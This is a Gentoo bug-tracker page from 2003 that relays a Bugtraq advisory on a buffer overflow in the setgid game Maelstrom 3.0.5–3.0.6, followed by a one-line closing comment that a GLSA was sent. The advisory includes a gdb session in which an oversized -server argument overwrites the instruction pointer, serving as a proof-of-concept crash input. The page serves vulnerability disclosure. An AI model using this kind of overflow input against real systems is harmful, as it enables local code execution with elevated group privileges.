Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 21499 - app-games/maelstrom
Summary: app-games/maelstrom
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Linux
Classification: Unclassified
Component: New packages (show other bugs)
Hardware: All Linux
: Highest critical (vote)
Assignee: Gentoo Security
URL:
Whiteboard:
Keywords:
Depends on:
Blocks:
 
Reported: 2003-05-22 15:50 UTC by Daniel Ahlberg (RETIRED)
Modified: 2003-05-30 08:07 UTC (History)
0 users

See Also:
Package list:
Runtime testing required: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Daniel Ahlberg (RETIRED) gentoo-dev 2003-05-22 15:50:19 UTC
Maelstrom Buffer Overflow 
 
From:  
Luca Ercoli <luca.ercoli@inwind.it> 
 
 
To:  
bugtraq@securityfocus.com 
 
 
Date:  
Sunday 15.52.04 
 
 
Maelstrom is an arcade game. There is a buffer overflow vulnerability in  
Maelstrom which allow local attacker  
arbitrary code execution. 
 
Vulnerable systems: Maelstrom 3.0.6 
                    Maelstrom 3.0.5 
 
Example: 
  
[lucae@linux]$ gdb /usr/bin/Maelstrom  
 
GNU gdb 5.2.1-2mdk (Mandrake Linux) 
Copyright 2002 Free Software Foundation, Inc. 
GDB is free software, covered by the GNU General Public License, and you  
are 
welcome to change it and/or distribute copies of it under certain  
conditions. 
Type "show copying" to see the conditions. 
There is absolutely no warranty for GDB.  Type "show warranty" for details. 
This GDB was configured as "i586-mandrake-linux-gnu"... 
 
(gdb) set args -server 2@`perl -e 'print "ABCD" x 9999'` 
(gdb) r 
 
Starting program: /usr/bin/Maelstrom -server 2@`perl -e 'print "ABCD" x  
9999'` 
Couldn't resolve host name for ABCDABC......ABCD 
 
Program received signal SIGSEGV, Segmentation fault. 
0x41444342 in ?? () 
 
(gdb) Quit 
 
 
 
Note: -rwxr-sr-x    1 root     games      171568 19 feb  
03:38 /usr/bin/Maelstrom   in Linux Professional 9.0 
 
 
 
Luca Ercoli luca.ercoli@inwind.it
Comment 1 Daniel Ahlberg (RETIRED) gentoo-dev 2003-05-30 08:07:49 UTC
glsa sent